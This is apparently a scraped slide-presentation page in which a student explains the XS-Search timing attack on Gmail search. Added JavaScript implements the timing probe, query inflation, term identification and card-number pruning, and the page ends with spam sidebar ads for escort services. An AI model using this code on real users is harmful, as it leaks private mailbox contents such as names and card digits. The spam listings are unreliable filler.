Cross-Site Search Attacks
CCS 2015
2 citations
Nethanel Gelernter, Department of Computer Science, Bar-Ilan University
Amir Herzberg, Department of Computer Science, Bar-Ilan University
Today's topic is the cross-site search attack. The authors are from Bar-Ilan University in Israel.
Outline
● Motivation
● Background
– XS-Timing Attack
● Challenge: XS-Timing Attack
● Problem
– How to utilize characteristics of search service to
overcome challenge
● Solution
● Evaluation
● Conclusion
This is the first paper to identify the XS-Search attack. The motivation section first explains why anyone would want to mount this kind of attack. The background then covers how XS-Search works; its basis is the XS-Timing attack, and I will describe how that is done. Then the key part: the challenge you hit when using an XS-Timing attack is the problem this paper sets out to solve. The paper finds that a common characteristic of search services happens to resolve that challenge. After that come the solution, the experimental evaluation and finally the conclusion.
Motivation
● Imagine you're an attacker who has a website
Imagine you are an attacker running a malicious website.
Motivation
● Imagine you're an attacker who has a website
● You can make your visitor
– send any requests
– and measure the response time
You also have control over the browsers of the visitors who come to your site: you can make a visitor's browser send arbitrary requests, any request to any destination, and after a request is sent you can measure how long the response takes.
Motivation
● Imagine you're an attacker who has a website
● You can make your visitor
– send any requests
– and measure the response time
● What request will you send?
So what request would you send, and what information would you hope to learn from it?
Motivation
● What request will you send?
– request to his Gmail home page?
What about sending a request to the visitor's Gmail home page?
Motivation
● What request will you send?
– request to his Gmail home page? → logged in or not
not logged in => fast; logged in => slower
Comparing the time difference, the most you can learn is whether he is logged in. From my own experience using a computer, it is faster when logged in and slower when not.
Motivation
● What request will you send?
– request to his Gmail home page? → logged in or not
– However, the visitor's network conditions vary
visitor A: not logged in => faster? visitor B: logged in => slower?
But on reflection something is off: the visitors are different people. If in reality visitor A is not logged in and visitor B is, will A really be faster than B? Not necessarily. A and B may be in very different locations; if A's route to Gmail is longer, the measured time may show A slower than B instead. So comparing response times across different visitors cannot tell you whether a visitor is logged in. What can be done about it?
Motivation
● To learn whether the user is logged in or not,
– use a dummy request with
– T(dummy) ~= T(not logged in)
visitor A (not logged in): Gmail 253 ms vs dummy 246 ms; visitor B (logged in): Gmail 100 ms vs dummy 15 ms
Then let each visitor be compared against himself. How? Suppose there is a dummy request whose response time is about the same as the not-logged-in time, whether or not the user is logged in. To learn whether a visitor is logged in, have that visitor send two requests, one to the Gmail home page and one to the dummy, and compare the two times. For example, A takes 252 ms to the Gmail home page and 246 ms to the dummy; the times are about the same, so we infer that A is not logged in. Done this way, we can tell whether a visitor is logged in even though visitors' network conditions differ.
Motivation
● What request will you send?
– request to search on his Gmail?
● seems to be more useful
dummy => always no match; target => unknown
Knowing whether the visitor is logged in to Gmail does not seem very useful. What about sending a request that searches the visitor's mailbox, checking whether a certain word has ever appeared in it? As before, the visitors' differing network conditions must be handled, so pick a search you know can never match, for example a randomly generated string, as the dummy. If the target search you care about is slower than the dummy, it has results. So what would you search for in the visitor's mailbox?
Motivation
● What request will you send?
– many requests for common names on his Gmail?
→ find out visitor's real name
Guess his real name? Brute-force every possible name; a match tells you what he is called.
Motivation
● What request will you send?
– many requests for common names on his Gmail?
→ find out visitor's real name
– many requests for xxxx-xxx-xxx on his Gmail?
→ find out visitor's phone number
The same brute-force search can find the visitor's phone number.
Motivation
● What request will you send?
– many requests for common names on his Gmail?
→ find out visitor's real name
– many requests for xxxx-xxx-xxx on his Gmail?
→ find out visitor's phone number
– many requests for no-reply@xxx.com?
● no-reply@firstbank.com.tw → a client of Taiwan FirstBank?
● no-reply@cht.tw → a mobile user of ChungHua Telecom?
● no-reply@amazon.com → likes to shop at Amazon?
Also, everyone has received mail from some no-reply@xxx address: subscribed blogs, trending YouTube videos, periodic bank digests and so on. So you can learn whether the visitor is a customer of Taiwan's First Bank, a Chunghwa Telecom subscriber, or has bought things on Amazon. The more of this you know, the more convincing a scam message you can write.
Motivation
● If you can make your visitor
– send any requests
– and measure the response time
● Targeting at search service can find more
sensitive information
So if you have the ability to make a visitor's browser send requests and time them, aiming at a search service seems very likely to turn up sensitive information.
Motivation
● You can make your visitor
– send any requests
– and measure the response time
XS-Timing Attack
The capability assumed at the start, making the visitor's browser send requests and measuring their time, is the attack technique known as the XS-Timing attack.
Motivation
● You can make your visitor
– send any requests
– and measure the response time
● XS Search Attack
= XS-Timing Attack on search service
XS-Timing Attack
Aiming it at a search service gives the XS-Search attack. Using XS-Timing, however, runs into a major challenge; this paper is the first to find that search services happen to resolve that challenge, which turns this attack into a real threat.
Outline
● Motivation
● Background
– XS-Timing Attack
● Challenge: XS-Timing Attack
● Problem
– How to utilize characteristics of search service to
overcome challenge
● Solution
● Evaluation
● Conclusion
XS-Timing Attack
● You can make your visitor
– send any requests
– and measure the response time
● Questions
– How to make visitor send request?
– Why not the response content?
First: how does the XS-Timing attack make the visitor send any request you want? Second: why can we only measure the time and not obtain the response content?
XS-Timing Attack
Suppose the request you want the visitor to send searches the Gmail mailbox for messages containing "little mountain".
XS-Timing Attack
URL = https://mail.google.com/mail/#search/little mountain
The request URL looks like this. How do we get the browser to send the request automatically?
XS-Timing Attack
URL = https://mail.google.com/mail/#search/little mountain
<img src="https://mail.google.com/mail/#search/little mountain">
Anyone who has written web pages knows that when the browser parses certain tags, such as the image tag, it automatically sends a GET request for the resource. So put the URL in the image's source; when the visitor's browser loads the page, it sends this request automatically.
XS-Timing Attack
[Diagram: a page on evil.com contains <img src="mail.google.com/mail/#search/little mountain">; the request goes to google.com]
But so far the first question is only half answered. You must be logged in to the mailbox to search it, and the site uses cookies to tell whether you are logged in: Gmail only processes this search request if Gmail's cookies are attached. Does the browser attach cookies to a request issued by an img tag?
XS-Timing Attack
[Diagram: the request from the evil.com page is sent to google.com]
Yes, it does. The browser looks at the request's destination, gmail, and automatically sends along the cookies it holds for that same domain.
XS-Timing Attack
[Diagram: google.com processes the request and returns the response to the browser]
Gmail receives the request, processes it and returns the search results.
XS-Timing Attack
[Diagram: the response reaches the browser on the evil.com page; Same-Origin Policy]
When the browser receives the response, it finds a web page rather than the image it was asked to fetch. Either way, the same-origin policy forbids the evil.com page from reading the content of this cross-origin response, so the harm the site can do is heavily limited. The complete set of rules on which resources a browser may request automatically, which it may not, and what it exposes of the response to the page is what the same-origin policy defines.
XS-Timing Attack
[Diagram: the same exchange between evil.com, the browser and google.com]
However,
you can measure the time
But here is the key point: even without seeing the response content, you can still measure the time from sending the request to receiving the response. If you can measure time, you can mount an XS-Timing attack.
Challenge: XS-Timing Attack
● Inferring from timing differences often makes mistakes!
The challenge of the XS-Timing attack: the biggest difficulty is that the method just described, comparing the time difference against a dummy to infer whether there is a match, is frequently wrong.
Challenge: XS-Timing Attack
● Inferring from timing differences often makes mistakes!
● Response time = T(communication) + T(computation)
The reason: first, the measured response time is the communication time for the request to travel to the server and back plus the computation time the server spends processing it.
Challenge: XS-Timing Attack
● Inferring from timing differences often makes mistakes!
● Response time = T(communication) + T(computation)
● Network condition
– Bad: timing difference dominated by T(communication)
– Good: T(computation) difference might be too small
First, when the network is bad, even if there is a time difference from the dummy you cannot tell whether it comes from real results rather than from delay. Second, suppose the network is stable and the communication time is constant; servers today are very powerful, so with or without results the computation may be so fast that no difference can be seen.
Challenge: XS-Timing Attack
● Inferring from timing differences often makes mistakes!
● Response time = T(communication) + T(computation)
● Network condition
– Bad: timing difference dominated by T(communication)
– Good: T(computation) difference might be too small
dummy => 0 matches, 10 samples, avg 734 ms
target => 50 matches, 10 samples, avg 751 ms
Some numbers: I wrote a website that performs XS-Timing and measured, on the stable dorm network, the time of two searches in my own mailbox: a dummy that searches a random string with no match, and a search for my account name with 50 matches. Sending 10 of each and averaging, the gap was only about 25 ms. So using XS-Timing directly, even on a stable network and with 50 matches, the result would very likely be misjudged.
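To make the measurement and the decision concrete, here is an added example (my code, not from the slides or the paper) of the attacker-page side of an XS-Timing probe: load the cross-site URL through an Image, time it with performance.now(), interleave target and dummy requests so both see the same network, and decide with a paired sign test rather than a raw average of the kind that gave the 734 ms vs 751 ms figures above. Two caveats the slides gloss over: the "#search/..." part of the Gmail URL is a fragment that the browser never sends to the server, so a real probe must use the URL the search UI actually requests (left as a placeholder here), and today's browsers apply SameSite=Lax to cookies by default, which stops them being attached to cross-site img loads; the paper predates that change. The URLs are placeholders and all timings are constructed, not measured.

```javascript
// Added example, not code from the paper or the slides.
// Attacker-page side of an XS-Timing probe: time a cross-site request
// whose body the page cannot read, and compare it against a dummy request
// that is known to return an empty result.
//
// Assumptions (not in the original): measureOnce/runAttack run in a
// browser (Image, performance.now); the two URLs are placeholders for the
// searched site's real search endpoint; the sample timings are constructed.

// Browser-only. The response is not an image, so onerror fires once the
// body has arrived. Its content is hidden by the same-origin policy, but
// the elapsed time is not.
function measureOnce(url) {
  return new Promise((resolve) => {
    const img = new Image();
    const start = performance.now();
    const done = () => resolve(performance.now() - start);
    img.onload = done;
    img.onerror = done;
    img.src = url;
  });
}

// Interleave target and dummy so each pair sees the same network state.
async function sampleInterleaved(targetUrl, dummyUrl, n) {
  const target = [];
  const dummy = [];
  for (let i = 0; i < n; i++) {
    target.push(await measureOnce(targetUrl));
    dummy.push(await measureOnce(dummyUrl));
  }
  return { target, dummy };
}

// Binomial coefficient via the multiplicative formula (exact for small n).
function choose(n, k) {
  let r = 1;
  for (let i = 1; i <= k; i++) r = (r * (n - k + i)) / i;
  return r;
}

// One-sided tail P[X >= k] for X ~ Binomial(n, 1/2): the probability of
// seeing at least k "target slower" pairs if both timings were identical.
function binomTailP(n, k) {
  let total = 0;
  for (let i = k; i <= n; i++) total += choose(n, i);
  return total / 2 ** n;
}

// Paired sign test: count pairs in which the target was slower than the
// dummy. Using per-pair signs instead of a mean difference makes the
// decision independent of the visitor's absolute network latency.
function decideNonEmpty(targetSamples, dummySamples, alpha = 0.05) {
  const n = Math.min(targetSamples.length, dummySamples.length);
  let wins = 0;
  for (let i = 0; i < n; i++) if (targetSamples[i] > dummySamples[i]) wins++;
  const p = binomTailP(n, wins);
  return { n, wins, p, nonEmpty: p < alpha };
}

// Browser-only end-to-end run: the decision for one target query.
async function runAttack(targetUrl, dummyUrl, n = 10) {
  const { target, dummy } = await sampleInterleaved(targetUrl, dummyUrl, n);
  return decideNonEmpty(target, dummy);
}

// Constructed timings in ms, not measured data. Dummy and plain target sit
// about 10 ms apart, like the 734 ms / 751 ms averages on the slide; the
// inflated target is what Compute-Inflate aims to produce.
const SAMPLE_DUMMY = [734, 748, 721, 739, 755, 730, 727, 744, 736, 750];
const SAMPLE_TARGET_PLAIN = [751, 742, 760, 733, 749, 766, 745, 738, 757, 748];
const SAMPLE_TARGET_INFLATED = [912, 898, 931, 905, 920, 889, 917, 926, 903, 911];

function demo() {
  return {
    plain: decideNonEmpty(SAMPLE_TARGET_PLAIN, SAMPLE_DUMMY),
    inflated: decideNonEmpty(SAMPLE_TARGET_INFLATED, SAMPLE_DUMMY),
  };
}
```

With the constructed data the plain target is slower in only 5 of 10 pairs (p ≈ 0.62, undecidable), while the inflated target wins all 10 pairs (p ≈ 0.001), which is exactly the gap the inflation techniques on the next slides are meant to open up. In a real run, runAttack(targetUrl, dummyUrl) would be called from the attacker page for each query.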
Problem
dummy query: always responds fast
target query
– fast => empty
– slower => non-empty
Enlarge the difference
● Response time = T(communication) + T(computation)
The key to making the timing attack more effective is to enlarge the time difference between a query that has results and the dummy.
Main Idea
● Enlarge timing difference strategy
T(communication) ∝ content length
– Response-Inflate
T(computation)
– Compute-Inflate
There are two directions for enlarging the time difference: 1. make the response longer when there is a match, increasing the network transfer time; 2. increase the amount of computation when there is a match.
Response-Inflate
Observation: the search query is copied once for each matched entry
The way to increase the length rests on this observation: in the results, the submitted search query is copied once for every matched entry.
Response-Inflate
Observation: the search query is copied once for each matched entry
=> extend the query to the maximum query size (< 8 KB)
So the longer the query, the longer the response, and you can use OR to lengthen the query without changing the search results.
Compute-Inflate
Observation: early abort on terms that resolve to false
A∧B
The observation used here is that a search service evaluates a query's terms in order and, for efficiency, usually aborts early. Take the query A AND B: if the evaluation order is A then B, and A evaluates to false, the service aborts at once and saves the time of computing B. In other words, if you can find a B that takes the search service a long time to compute, you can greatly increase the time difference when there is a match.
Compute-Inflate
Observation: early abort on terms that resolve to false
[Diagram: Dummy vs Target evaluation of A∧B]
This is not hard to arrange in Gmail: after the word you want to search for, negate (NOT) a large number of words that cannot possibly exist. If you append 100 of them, Gmail has to confirm that a message really contains none of them before it can return.
Compute-Inflate
Observation: early abort on terms that resolve to false
=> can detect even a single match on Gmail!
[Diagram: Dummy vs Target evaluation of A∧B]
The effect is excellent: the claim is that in an active Gmail account even a query with a single match can be detected.
Evaluation: Compute-Inflate
● 138 active Gmail users
– 90 university schoolmates
– 48 Amazon M-Turk workers
● Sent an email containing a single sentence
– “I like [random-animal]”
[Diagram: Dummy vs Target]
Now to evaluate the effect of compute-inflate. The experiment recruited 138 active Gmail users: 90 classmates from the department and 48 MTurk workers. Each person was sent one email containing a sentence certain to appear only once, "I like [some animal]".
Evaluation: Compute-Inflate
These are the experimental results. n is the number of samples; a statistical test is applied afterwards to make the decision.
Evaluation: Compute-Inflate
Look at the FN for the simple query, which only lengthens the query without compute-inflate: the error rate is over 50%, worse than random guessing, so I am not sure the figures can be trusted. In any case, the point he wants to make is that a single match is easily misjudged.
Evaluation: Compute-Inflate
With compute-inflate, FN drops below 10%, a sharp fall in misjudgements. FP is low throughout; the main reason a query with no match gets judged as matching is network delay, so this indicates that network delay has little effect.
Evaluation: Compute-Inflate
Efficient Term Identification
● Which of {T1,T2,...} appears in mailbox?
Next, a more useful algorithm can be developed. Suppose you have a list of words T1, T2, ... and want to know which of them have appeared in the mailbox. How would you do it?
Efficient Term Identification
● Which of {T1,T2,...} appears in mailbox?
● Can you come up with a better solution?
● Naive
– Query terms one by one
– O(n)
The naive idea is to search for the words one by one and see which ones hit. Anyone who has studied algorithms should be able to think of something better.
Efficient Term Identification
● Which of {T1,T2,...} appears in mailbox?
● Can you come up with a better solution?
● Naive
– Query terms one by one
– O(n)
– Binary search
– O(log n)
Combine OR with divide and conquer.
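As an added example (my code, not the paper's or the slides'), the following puts the three pieces just described together: Compute-Inflate by appending excluded terms that never match, Response-Inflate by OR-padding the query up to the 8 KB limit, and divide-and-conquer identification of which candidate terms appear, asking the oracle about OR-groups and pruning whole halves that come back empty. It assumes a Gmail-like query grammar (quoted phrases, OR, parentheses, a leading "-" to exclude a term), that tokens starting with zzqx occur in no mailbox, and a simulated oracle over a constructed mailbox standing in for the timing decision. The same routine, run over the 10,000 four-digit strings as the term list, is step 1 of the credit-card flow on a later slide.

```javascript
// Added example, not code from the paper or the slides.
// Query inflation plus divide-and-conquer term identification.
//
// Assumptions (not in the original): Gmail-like query syntax (quoted
// phrases, OR, parentheses, leading "-" excludes a term); an 8 KB query
// limit; tokens starting with zzqx never occur in any mailbox; the oracle
// is simulated on a constructed mailbox where the real attack would take
// each yes/no answer from the timing decision.

const MAX_QUERY_BYTES = 8 * 1024;
const PADDING_TERMS = 100;

// OR-group candidate terms into one positive clause.
function orClause(terms) {
  return '(' + terms.map((t) => `"${t}"`).join(' OR ') + ')';
}

// Compute-Inflate: the positive clause is evaluated first. With no match
// the engine aborts early; with a match it must also verify every excluded
// term, so a non-empty result costs measurably more server time.
function computeInflate(positiveClause, padding = PADDING_TERMS) {
  const negatives = Array.from({ length: padding }, (_, i) => `-zzqx${i}`);
  return `${positiveClause} ${negatives.join(' ')}`;
}

// Response-Inflate: the query text is echoed once per matched entry, so a
// longer query makes a non-empty response proportionally larger. OR-ing in
// never-matching tokens lengthens the query without changing the results.
function responseInflate(positiveClause, maxBytes = MAX_QUERY_BYTES) {
  const enc = new TextEncoder();
  const parts = [positiveClause];
  let bytes = enc.encode(`(${positiveClause})`).length;
  for (let i = 0; ; i++) {
    const pad = ` OR "zzqxpad${i}"`;
    const padBytes = enc.encode(pad).length;
    if (bytes + padBytes > maxBytes) break;
    parts.push(`"zzqxpad${i}"`);
    bytes += padBytes;
  }
  return `(${parts.join(' OR ')})`;
}

// Simulated oracle: "does this query return anything?" over a constructed
// mailbox. Stands in for the timing decision of the real attack. Matching
// is plain substring search, a simplification of Gmail's tokenised search.
function makeSimulatedOracle(messages) {
  const corpus = messages.map((m) => m.toLowerCase());
  return (query) => {
    const phrases = [...query.matchAll(/"([^"]+)"/g)].map((m) => m[1].toLowerCase());
    const excluded = [...query.matchAll(/(?:^|\s)-(\S+)/g)].map((m) => m[1].toLowerCase());
    return corpus.some(
      (msg) => phrases.some((p) => msg.includes(p)) && !excluded.some((e) => msg.includes(e)),
    );
  };
}

// Divide and conquer: one query tells whether ANY term of a group is
// present, and an empty answer prunes the whole group. With k of n terms
// present this needs about 2k*log2(n) queries instead of n.
function identifyTerms(terms, oracle, log = []) {
  if (terms.length === 0) return [];
  const query = computeInflate(orClause(terms));
  log.push(query);
  if (!oracle(query)) return [];
  if (terms.length === 1) return [terms[0]];
  const mid = terms.length >> 1;
  return identifyTerms(terms.slice(0, mid), oracle, log).concat(
    identifyTerms(terms.slice(mid), oracle, log),
  );
}

// Constructed mailbox and candidate list (the slides' 32-animal setup
// shrunk to 8), not real data.
const SAMPLE_MAILBOX = [
  'Hi Alice, I like the otter. See you at the lab.',
  'Your monthly statement from no-reply@example-bank.test is ready',
  'Reminder: the meeting moved to Thursday',
];
const ANIMALS = ['cat', 'dog', 'otter', 'fox', 'owl', 'bear', 'wolf', 'hare'];

function demo() {
  const log = [];
  const found = identifyTerms(ANIMALS, makeSimulatedOracle(SAMPLE_MAILBOX), log);
  return { found, queries: log.length, naiveQueries: ANIMALS.length };
}
```

On the constructed mailbox the search finds "otter" with 7 oracle calls against 8 for the naive one-by-one scan; the saving grows with the list, to roughly 11 queries for the 32 animals of the experiment and a few dozen for the 10,000 four-digit groups, provided only a handful of terms are actually present.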
Evaluation: Efficient Term Identification
● 138 active Gmail user
● Sent an email containing a single sentence
– “I like [random-animal]”
– 32 animal options
[Table: accuracy and time per statistical test]
Again 138 users, each sent one email with a sentence that appears only once in the mailbox, "I like [some animal]", with 32 animals to choose from. This time the goal is to identify exactly which animal each person likes. The columns are different statistical tests. With 25 requests the accuracy is about 60%; with 50, about 70%.
Claimed Experiment
● Attack on credit card numbers
– Focus on MasterCard, Visa
● Format: 4-4-4-4
● Attack Flow
1. Find all four 4-digit numbers (10,000 options)
2. Find the order of the 4-digit numbers
● discard wrong combinations using the credit card checksum
Next is the one I was most looking forward to: they say they ran an experiment of finding credit card numbers on their own accounts, but to my disappointment, probably for ethical reasons, the paper only describes the method and gives no results. The idea is that card numbers have a format: groups of 4 digits separated by a dash or a space. So divide and conquer over the 10,000 possible values of a 4-digit group to find which four 4-digit groups are present, then try their order.
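The checksum step deserves a closer look, so here is an added example (my code, not the paper's or the slides') that implements the pruning the slide mentions and shows what it can and cannot do. With a 16-digit number written as four 4-digit groups, every group starts at an even offset, so the Luhn algorithm doubles the same two digits of a group wherever the group sits; the checksum is therefore invariant under reordering the groups. It cannot rank the 24 orderings of step 2, but it does prune step 1: of all the 4-digit strings a mailbox search turns up (order numbers, years, PINs), only sets of four whose Luhn weights sum to 0 mod 10 can be a card at all. The groups below are constructed test data: 4539 1488 0343 6467 is a Luhn-valid number and 2468 a decoy.

```javascript
// Added example, not code from the paper or the slides.
// The checksum step of the credit-card flow: what the Luhn check can prune
// once the 4-digit groups are known, and what it cannot.
//
// Assumptions (not in the original): 16-digit Visa/MasterCard-style PANs
// with a Luhn check digit, written as four 4-digit groups; the groups
// below are constructed (4539 1488 0343 6467 is Luhn-valid, 2468 is a decoy
// 4-digit number such as an order ID from an unrelated mail).

// Standard Luhn check over a digit string.
function luhnValid(pan) {
  let sum = 0;
  let double = false;
  for (let i = pan.length - 1; i >= 0; i--, double = !double) {
    let d = pan.charCodeAt(i) - 48;
    if (double) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
  }
  return sum % 10 === 0;
}

// Luhn weight contributed by one 4-digit group. In a 16-digit PAN every
// group starts at an even offset, so its 1st and 3rd digits are the doubled
// ones no matter where the group sits: the contribution does not depend on
// the group's position.
function groupContribution(group) {
  let sum = 0;
  for (let i = 0; i < group.length; i++) {
    let d = group.charCodeAt(i) - 48;
    if (i % 2 === 0) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
  }
  return sum;
}

function combinations(items, k, start = 0, prefix = []) {
  if (prefix.length === k) return [prefix];
  const out = [];
  for (let i = start; i < items.length; i++) {
    out.push(...combinations(items, k, i + 1, prefix.concat(items[i])));
  }
  return out;
}

function permutations(items) {
  if (items.length <= 1) return [items];
  const out = [];
  items.forEach((x, i) => {
    const rest = items.slice(0, i).concat(items.slice(i + 1));
    for (const p of permutations(rest)) out.push([x].concat(p));
  });
  return out;
}

// Which sets of four groups, out of all 4-digit strings step 1 found in the
// mailbox, can form a Luhn-valid card at all? This is where the checksum
// really prunes: decoy 4-digit numbers drop out.
function consistentCombinations(candidateGroups) {
  return combinations(candidateGroups, 4).filter(
    (combo) => combo.reduce((s, g) => s + groupContribution(g), 0) % 10 === 0,
  );
}

// Orderings of four given groups that pass Luhn. Because each group's
// contribution is position-independent, either all 24 pass or none do, so
// the checksum cannot tell the orderings apart; step 2 needs another signal.
function orderingsPassingLuhn(groups) {
  return permutations(groups).map((p) => p.join('')).filter(luhnValid);
}

// Constructed input: the four true groups plus one decoy.
const CANDIDATE_GROUPS = ['4539', '1488', '0343', '6467', '2468'];

function demo() {
  const combos = consistentCombinations(CANDIDATE_GROUPS);
  return {
    combos,
    orderings: combos.length ? orderingsPassingLuhn(combos[0]) : [],
  };
}
```

On the constructed input the checksum narrows five candidate groups to the single consistent set of four, but then accepts all 24 orderings of that set, which is why the ordering step has to rely on something other than the checksum.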
Conclusion
● Good discovery of how search service makes
XS-Timing Attack realistic
● Typical bad paper writing style
This paper's finding, that a search service can be used to make the XS-Timing attack far stronger than was traditionally thought possible, is very interesting. The downside is that the writing style is the kind of bad paper my advisor keeps warning me not to pick: the main idea and algorithm are simple but are written in a complicated way, and the experiments likewise: one representative data set would do, yet they insist on a pile of identical experiments that stuff the paper, while the things everyone is interested in are skimmed over. That is not good; let us take it as a lesson.

 
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
Junnasandra Call Girls: 🍓 7737669865 🍓 High Profile Model Escorts | Bangalore...
 
CebaBaby dropshipping via API with DroFX.pptx
CebaBaby dropshipping via API with DroFX.pptxCebaBaby dropshipping via API with DroFX.pptx
CebaBaby dropshipping via API with DroFX.pptx
 
CHEAP Call Girls in Saket (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Saket (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Saket (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Saket (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
Smarteg dropshipping via API with DroFx.pptx
Smarteg dropshipping via API with DroFx.pptxSmarteg dropshipping via API with DroFx.pptx
Smarteg dropshipping via API with DroFx.pptx
 
Sampling (random) method and Non random.ppt
Sampling (random) method and Non random.pptSampling (random) method and Non random.ppt
Sampling (random) method and Non random.ppt
 
Determinants of health, dimensions of health, positive health and spectrum of...
Determinants of health, dimensions of health, positive health and spectrum of...Determinants of health, dimensions of health, positive health and spectrum of...
Determinants of health, dimensions of health, positive health and spectrum of...
 
Invezz.com - Grow your wealth with trading signals
Invezz.com - Grow your wealth with trading signalsInvezz.com - Grow your wealth with trading signals
Invezz.com - Grow your wealth with trading signals
 
BPAC WITH UFSBI GENERAL PRESENTATION 18_05_2017-1.pptx
BPAC WITH UFSBI GENERAL PRESENTATION 18_05_2017-1.pptxBPAC WITH UFSBI GENERAL PRESENTATION 18_05_2017-1.pptx
BPAC WITH UFSBI GENERAL PRESENTATION 18_05_2017-1.pptx
 
Data-Analysis for Chicago Crime Data 2023
Data-Analysis for Chicago Crime Data  2023Data-Analysis for Chicago Crime Data  2023
Data-Analysis for Chicago Crime Data 2023
 
Week-01-2.ppt BBB human Computer interaction
Week-01-2.ppt BBB human Computer interactionWeek-01-2.ppt BBB human Computer interaction
Week-01-2.ppt BBB human Computer interaction
 
Call Girls In Shalimar Bagh ( Delhi) 9953330565 Escorts Service
Call Girls In Shalimar Bagh ( Delhi) 9953330565 Escorts ServiceCall Girls In Shalimar Bagh ( Delhi) 9953330565 Escorts Service
Call Girls In Shalimar Bagh ( Delhi) 9953330565 Escorts Service
 
BDSM⚡Call Girls in Mandawali Delhi >༒8448380779 Escort Service
BDSM⚡Call Girls in Mandawali Delhi >༒8448380779 Escort ServiceBDSM⚡Call Girls in Mandawali Delhi >༒8448380779 Escort Service
BDSM⚡Call Girls in Mandawali Delhi >༒8448380779 Escort Service
 
Digital Advertising Lecture for Advanced Digital & Social Media Strategy at U...
Digital Advertising Lecture for Advanced Digital & Social Media Strategy at U...Digital Advertising Lecture for Advanced Digital & Social Media Strategy at U...
Digital Advertising Lecture for Advanced Digital & Social Media Strategy at U...
 
Call Girls Indiranagar Just Call 👗 7737669865 👗 Top Class Call Girl Service B...
Call Girls Indiranagar Just Call 👗 7737669865 👗 Top Class Call Girl Service B...Call Girls Indiranagar Just Call 👗 7737669865 👗 Top Class Call Girl Service B...
Call Girls Indiranagar Just Call 👗 7737669865 👗 Top Class Call Girl Service B...
 
Edukaciniai dropshipping via API with DroFx
Edukaciniai dropshipping via API with DroFxEdukaciniai dropshipping via API with DroFx
Edukaciniai dropshipping via API with DroFx
 
Carero dropshipping via API with DroFx.pptx
Carero dropshipping via API with DroFx.pptxCarero dropshipping via API with DroFx.pptx
Carero dropshipping via API with DroFx.pptx
 
Delhi Call Girls CP 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls CP 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls CP 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls CP 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 

XSSearch

  • 49. Cross-Site Search Attacks CCS 2015 2 citations Nethanel Gelernter Department of Computer Science at Bar Ilan University Amir Herzberg Department of Computer Science at Bar Ilan University Notes: Today's topic is the cross-site search attack; the authors are from Bar Ilan University in Israel.
  • 50. Outline ● Motivation ● Background – XS-Timing Attack ● Challenge: XS-Timing Attack ● Problem – How to utilize characteristics of search service to overcome challenge ● Solution ● Evaluation ● Conclusion Notes: This is the first paper to discover the XS Search Attack. The motivation first explains why someone would want to mount this kind of attack; then the background covers how the XS Search Attack works. It is based on the XS-Timing Attack, and I will describe how that is done. Then the key part: the challenge you run into when using the XS-Timing attack is the problem this paper solves, and the paper finds that a common characteristic of search services happens to resolve that challenge. After that come the solution, the evaluation experiments, and finally the conclusion.
  • 51. Motivation ● Imagine you're an attacker, who has a website Notes: Imagine you are an attacker running a malicious website.
  • 52. Motivation ● Imagine you're an attacker, who has a website ● You can make your visitor – send any requests – and measure the response time Notes: And you are able to control the browser of a visitor to your site: you can make the visitor's browser send any request, whatever content and to whatever destination, and once it is sent you can measure the request's response time.
  • 53. Motivation ● Imagine you're an attacker, who has a website ● You can make your visitor – send any requests – and measure the response time ● What request will you send? Notes: So what request would you send, and what information would you want to get from it?
  • 54. Motivation ● What request will you send? – request to his Gmail home page? Notes: How about sending a request to the visitor's Gmail home page?
  • 55. Motivation ● What request will you send? – request to his Gmail home page? → logged in or not: not logged in => fast, logged in => slower Notes: By comparing the time difference, at most you can learn whether he is logged in. From my own experience on a computer, it is faster when logged in and slower when not.
  • 56. Motivation ● What request will you send? – request to his Gmail home page? → logged in or not – However, visitor's network condition varies: visitorA: not logged in => faster? visitorB: logged in => slower? Notes: But thinking about it more carefully, something is off: visitors are different people. Suppose visitor A is not logged in and visitor B is; will A really be faster than B? Not necessarily. A and B may be in very different locations; if A's route to Gmail takes longer, the measured time could instead be A slower than B. So comparing response times across different visitors cannot tell whether a visitor is logged in. What to do then?
  • 57. Motivation ● To know whether the user is logged in or not, – there's a dummy request, – T(dummy) ~= T(not logged in) (figure: visitorA, not logged in: 253ms vs dummy 246ms; visitorB, logged in: 100ms vs dummy 15ms) Notes: Then let the visitor compare against himself. How? Suppose there is a dummy request whose response time is about the same as the not-logged-in time regardless of whether the user is logged in. Then, to learn whether the visitor is logged in, have that visitor send two requests, one to the Gmail home page and one dummy, and compare their times. For example, A takes 252ms to the Gmail home page and 246ms to the dummy; the times are about the same, so we can infer A is not logged in. This way, even if visitors' network conditions differ, you can still tell whether a visitor is logged in.
  • 58. Motivation ● What request will you send? – request to search on his Gmail? ● seems to be more useful (figure: dummy => always no match; target) Notes: Knowing whether the visitor is logged in to Gmail doesn't seem that useful. How about sending a request that searches the visitor's mailbox, to check whether some word has ever appeared in it? As before, to handle visitors' differing network conditions, you can pick a search you know will never match, say a randomly generated string, as the dummy. If the target you want to search for is slower than the dummy, it has results. So what would you search for in the visitor's mailbox?
  • 59. Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name Notes: Guess his real name? Brute-force all possible names; whichever matches tells you his name.
  • 60. Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name – many requests for xxxx-xxx-xxx on his Gmail? → find out visitor's phone number Notes: The same brute-force search can find the visitor's mobile phone number.
